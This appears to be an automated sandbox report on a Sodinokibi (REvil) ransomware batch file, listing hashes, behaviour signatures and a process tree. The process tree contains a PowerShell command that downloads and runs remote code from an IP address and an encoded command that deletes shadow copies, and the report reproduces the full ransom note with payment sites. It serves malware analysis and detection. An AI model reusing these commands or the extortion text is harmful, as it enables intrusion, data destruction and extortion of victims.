Overview

overview

10

Static

static

1Agr4GZR.bat

windows7_x64

10

1Agr4GZR.bat

windows10_x64

10

Analysis

  • max time kernel
    136s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    05-03-2020 05:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1Agr4GZR.bat

  • Size

    195B

  • MD5

    d8f17b7d64fd968c76fbda7167c2bf8e

  • SHA1

    f90525aef93a39c5d07aab4cd7c5e8a87bc91ffe

  • SHA256

    6bdb2e75595098a2c5dd9026ec2ac6d13fa279cd6d23217e7c0e28cc3318c708

  • SHA512

    bfa55509af5be01bef540b299bf7737db0e69b7d811ec59412335f7be17e22d2fe1a4483d693e1daa4dc7f6538006669715b0718a5e78a7f750875c61cbb22d9

Score
10/10
ransomwaresodinokibipersistenceevasionspywaretrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/1Agr4GZR

Extracted

Path

C:\ep68q4s85-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ep68q4s85. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F6228642C93D0AF2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F6228642C93D0AF2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: FeMsLxGH02F69FF5soGWKhi0dplJkJi0amnQ2b72tjGZag6MXhEKDLnALgk3dD/F xUuuS6tjq25bW20/E8D7YYl4vsNavR5/n6D0sLaNwGYr0UURfrBvAca/lfslMh+l NSIKGhPdIFfWioISJWITNS2kNR4Cv5DWIBr+cgRkBdt+Eln58OFNJCgr7XtKNk1s S9pkWMuVwXDKoebQywCnvWXXkerZBIGBG4HldHNprfolYgJYkivxwH0aN6kPZdJF 7CwP7V6vMLjiHiNbmhiwfnPul3ol573yTlYswFVw3+x/okM32Zs5WWlW99OjTnPO 7B1tJDHGVPsO+j4wvHzM69PdgszloYdPutcJpA5BfcAg+3ivT36ahB6KDbJ5rBJF d3cxQr9pZeH2DwwaARwLUBWmYBzdxJXtr8t0K8PrDnZl6LBTdS1gGUDIzcfmZxkz KyPHoGsZbcYgjlzW55avGsNfui+MuB48QCiMnf5c5vW7AAHB9X2I0pFNyUwAKj7Y XB+wnYe9mUPhhTkRpqFJAeJM0ggxrWV90x0rSSE1D/ImvXav01sOUqsmsLspM5IB o+xpMz286GfmDDKkZ1epkqRL1cb6WEmL5Uvyo798lSJmvC54GbGBW4QSveiAEvzx Zi33Yeatgdxn+lsz0QeCTnnAgnb4e9cowgtDfio21jU0qV6j6ahrrZSXf9cJS+1O 10pq15qcyqbF1Clv/SNdtt+Dmgc33HPyQFzCl+q4X5IBK8xewOsEL6rePdY+OObm krdrp84OYi6WYtfCExFj+7qL9kCRY4yk8RtgjqRqXbJA/4Lg9T4kCmazLoqPOrGP 14RgE57ax97FJpEHuHgOX7oEDiTWbNFthkr4Ehby7RvocZnOW6yO9y0QZ8i8EfdJ y3Wm/42BSz5msB+MmDDTj2o+OVaPvRVAx2Zzdid9wTGZY5HUtWeVJxZ+JQcEA6Kk zT/L+5QDdUh6yUbusiBdFDRNDgg5p7ZKwurKRMZPaUZmZafjHdT4efTsZp+1ipQ/ uA09YEWHg6OPfjTF6LnzjX9BIAPj9JGOZqywvtZSwUSvhYkYOszJTy7iZFvBOrcq 3SR0AIarRnLgkt9ww4uEIB8RbLGcpQ/4W6hQEdhORpfCGwD9t7LrInjZzObqTHXm sgdlSs+2KaPkaLOtfmxZewMuL2ZrIL6igwif4tadRktkQkbqlRqzvxd9PkKzUlBR 8nHbNaED7EsA10F1nmjyRS1YxYePTpBdpcVk7y6489zQCGkJ9Yvtfc1e5PbHqtF/ N754YuJcfpjzVjPvoA7O93gwbsXXGcNekcjAnbomGOHPfLNQH2w= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F6228642C93D0AF2

http://decryptor.cc/F6228642C93D0AF2

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 131 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
    ransomware
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 33 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1Agr4GZR.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1Agr4GZR');Invoke-CTSICHQLFDEF;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Discovering connected drives
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Modifies system certificate store
      PID:1852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1340

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit